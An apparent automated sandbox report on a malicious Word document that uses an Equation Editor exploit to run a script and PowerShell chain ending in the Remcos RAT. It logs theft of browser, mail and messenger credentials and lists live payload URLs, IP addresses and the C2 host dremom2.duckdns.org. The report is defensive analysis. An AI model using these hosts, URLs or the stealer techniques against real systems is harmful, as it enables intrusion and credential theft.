                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword14_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
                    Yara detected WebBrowserPassView password recovery tool
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4084, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-OT0ZCGJump to behavior
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe12_2_0040569A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts11
                    Native API                    		111
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		13
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts43
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		1
                    Bypass User Account Control                    		21
                    Obfuscated Files or Information                    		111
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts123
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		2
                    Credentials in Registry                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares2
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		Login Hook1
                    Windows Service                    		1
                    Bypass User Account Control                    		3
                    Credentials In Files                    		4
                    File and Directory Discovery                    		Distributed Component Object Model111
                    Input Capture                    		1
                    Remote Access Software                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell                    		Network Logon Script422
                    Process Injection                    		1
                    Masquerading                    		LSA Secrets38
                    System Information Discovery                    		SSH3
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials3
                    Security Software Discovery                    		VNCGUI Input Capture213
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation                    		DCSync21
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                    Process Injection                    		Proc Filesystem4
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    Remote System Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1508111 Sample: xrrwwstCMd.docx Startdate: 09/09/2024 Architecture: WINDOWS Score: 100 52 zeep.ly 2->52 80 Suricata IDS alerts for network traffic 2->80 82 Found malware configuration 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 24 other signatures 2->86 12 WINWORD.EXE 347 49 2->12         started        signatures3 process4 dnsIp5 56 zeep.ly 95.217.202.210, 443, 49161, 49162 HETZNER-ASDE Germany 12->56 58 85.239.241.184, 49167, 49169, 49171 CASABLANCA-ASInternetCollocationProviderCZ Czech Republic 12->58 44 C:\Users\user\...\xrrwwstCMd.docx (copy), Microsoft 12->44 dropped 46 C:\Users\user\AppData\Roaming\...\rXgoN.url, MS 12->46 dropped 48 C:\Users\user\...\gvt on 85.239.241.184.url, MS 12->48 dropped 50 3 other malicious files 12->50 dropped 112 Microsoft Office launches external ms-search protocol handler (WebDAV) 12->112 114 Office viewer loads remote template 12->114 116 Microsoft Office drops suspicious files 12->116 17 EQNEDT32.EXE 12 12->17         started        file6 signatures7 process8 file9 42 C:\...\fastgeecleancheckupnewthinkstobege.vbs, Unicode 17->42 dropped 76 Office equation editor establishes network connection 17->76 78 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 17->78 21 wscript.exe 1 17->21         started        signatures10 process11 signatures12 96 Suspicious powershell command line found 21->96 98 Wscript starts Powershell (via cmd or directly) 21->98 100 Very long command line found 21->100 102 3 other signatures 21->102 24 powershell.exe 4 21->24         started        process13 signatures14 104 Suspicious powershell command line found 24->104 106 Suspicious execution chain found 24->106 27 powershell.exe 12 5 24->27         started        process15 dnsIp16 54 ia601706.us.archive.org 207.241.227.96, 443, 49170 INTERNET-ARCHIVEUS United States 27->54 108 Writes to foreign memory regions 27->108 110 Injects a PE file into a foreign processes 27->110 31 RegAsm.exe 3 10 27->31         started        signatures17 process18 dnsIp19 60 dremom2.duckdns.org 31->60 62 dremom2.duckdns.org 45.89.247.65, 2201, 49172, 49173 CMCSUS United Kingdom 31->62 64 geoplugin.net 178.237.33.50, 49174, 80 ATOM86-ASATOM86NL Netherlands 31->64 66 Contains functionality to bypass UAC (CMSTPLUA) 31->66 68 Detected Remcos RAT 31->68 70 Tries to steal Mail credentials (via file registry) 31->70 74 7 other signatures 31->74 35 RegAsm.exe 1 31->35         started        38 RegAsm.exe 1 31->38         started        40 RegAsm.exe 11 31->40         started        signatures20 72 Uses dynamic DNS services 60->72 process21 signatures22 88 Tries to steal Instant Messenger accounts or passwords 35->88 90 Tries to steal Mail credentials (via file / registry access) 35->90 92 Searches for Windows Mail specific files 35->92 94 Tries to harvest and steal browser information (history, passwords, etc) 38->94

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    xrrwwstCMd.docx13%ReversingLabsWin32.Trojan.Generic
                    xrrwwstCMd.docx100%AviraTR/AVI.Malware.ujrxw

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc100%AviraHEUR/Rtf.Malformed
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc100%AviraHEUR/Rtf.Malformed
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp100%AviraEXP/CVE-2017-11882.Gen

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%Avira URL Cloudsafe
                    http://ocsp.entrust.net030%Avira URL Cloudsafe
                    http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%Avira URL Cloudsafe
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                    http://www.imvu.comr0%Avira URL Cloudsafe
                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%Avira URL Cloudsafe
                    http://b.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
                    http://acdn.adnxs.com/ast/ast.js0%Avira URL Cloudsafe
                    https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
                    http://zeep.ly/rXgoN0%Avira URL Cloudsafe
                    http://www.nirsoft.net0%Avira URL Cloudsafe
                    https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
                    http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%Avira URL Cloudsafe
                    http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIF0%Avira URL Cloudsafe
                    http://www.diginotar.nl/cps/pkioverheid00%Avira URL Cloudsafe
                    https://zeep.ly/rXgoN0%Avira URL Cloudsafe
                    https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%Avira URL Cloudsafe
                    http://go.micros0%Avira URL Cloudsafe
                    https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%Avira URL Cloudsafe
                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                    http://cache.btrll.com/default/Pix-1x1.gif0%Avira URL Cloudsafe
                    https://www.google.com0%Avira URL Cloudsafe
                    https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp/C0%Avira URL Cloudsafe
                    http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%Avira URL Cloudsafe
                    http://www.msn.com/?ocid=iehp0%Avira URL Cloudsafe
                    http://static.chartbeat.com/js/chartbeat.js0%Avira URL Cloudsafe
                    http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%Avira URL Cloudsafe
                    http://o.aolcdn.com/ads/adswrappermsni.js0%Avira URL Cloudsafe
                    http://www.msn.com/de-de/?ocid=iehp0%Avira URL Cloudsafe
                    dremom2.duckdns.org100%Avira URL Cloudmalware
                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%Avira URL Cloudsafe
                    http://www.nirsoft.net/0%Avira URL Cloudsafe
                    http://ocsp.entrust.net0D0%Avira URL Cloudsafe
                    https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                    https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%Avira URL Cloudsafe
                    http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%Avira URL Cloudsafe
                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%Avira URL Cloudsafe
                    https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%Avira URL Cloudsafe
                    http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%Avira URL Cloudsafe
                    http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFm0%Avira URL Cloudsafe
                    http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js0%Avira URL Cloudsafe
                    http://crl.entrust.net/server1.crl00%Avira URL Cloudsafe
                    http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFj0%Avira URL Cloudsafe
                    https://www.ccleaner.com/go/app_cc_pro_trialkey0%Avira URL Cloudsafe
                    http://www.imvu.com/JK0%Avira URL Cloudsafe
                    http://85.239.241.184/50/gvt/0%Avira URL Cloudsafe
                    http://85.239.241.184/50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc0%Avira URL Cloudsafe
                    https://contextual.media.net/8/nrrV73987.js0%Avira URL Cloudsafe
                    https://contextual.media.net/0%Avira URL Cloudsafe
                    http://www.imvu.com0%Avira URL Cloudsafe
                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%20%Avira URL Cloudsafe
                    http://www.msn.com/0%Avira URL Cloudsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp0%Avira URL Cloudsafe
                    http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp%A0%Avira URL Cloudsafe
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                    https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=5916504975490%Avira URL Cloudsafe
                    http://85.239.241.184/50/RMHC.txt0%Avira URL Cloudsafe
                    http://85.239.241.1840%Avira URL Cloudsafe
                    https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg0%Avira URL Cloudsafe
                    https://ia601706.us.archive.org0%Avira URL Cloudsafe
                    https://secure.comodo.com/CPS00%Avira URL Cloudsafe
                    http://cdn.at.atwola.com/_media/uac/msn.html0%Avira URL Cloudsafe
                    http://go.microsoft.c0%Avira URL Cloudsafe
                    https://ia601706.us.archive.org/2/items/new_image_LR0%Avira URL Cloudsafe
                    https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                    http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset0%Avira URL Cloudsafe
                    https://policies.yahoo.com/w3c/p3p.xml0%Avira URL Cloudsafe
                    http://crl.entrust.net/2048ca.crl00%Avira URL Cloudsafe
                    http://www.msn.com/advertisement.ad.js0%Avira URL Cloudsafe
                    http://www.ebuddy.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    zeep.ly
                    		95.217.202.210
                    		truetrue
                      		unknown
                      dremom2.duckdns.org
                      		45.89.247.65
                      		truetrue
                        		unknown
                        geoplugin.net
                        		178.237.33.50
                        		truefalse
                          		unknown
                          ia601706.us.archive.org
                          		207.241.227.96
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://zeep.ly/rXgoNfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFtrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://zeep.ly/rXgoNfalse
                            • Avira URL Cloud: safe
                            		unknown
                            dremom2.duckdns.orgtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://85.239.241.184/50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doctrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://geoplugin.net/json.gpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://85.239.241.184/50/RMHC.txttrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpgtrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://b.scorecardresearch.com/beacon.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://acdn.adnxs.com/ast/ast.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.imvu.comrRegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.entrust.net03powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000D.00000002.405468738.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.405476161.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.405464101.0000000002B5E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
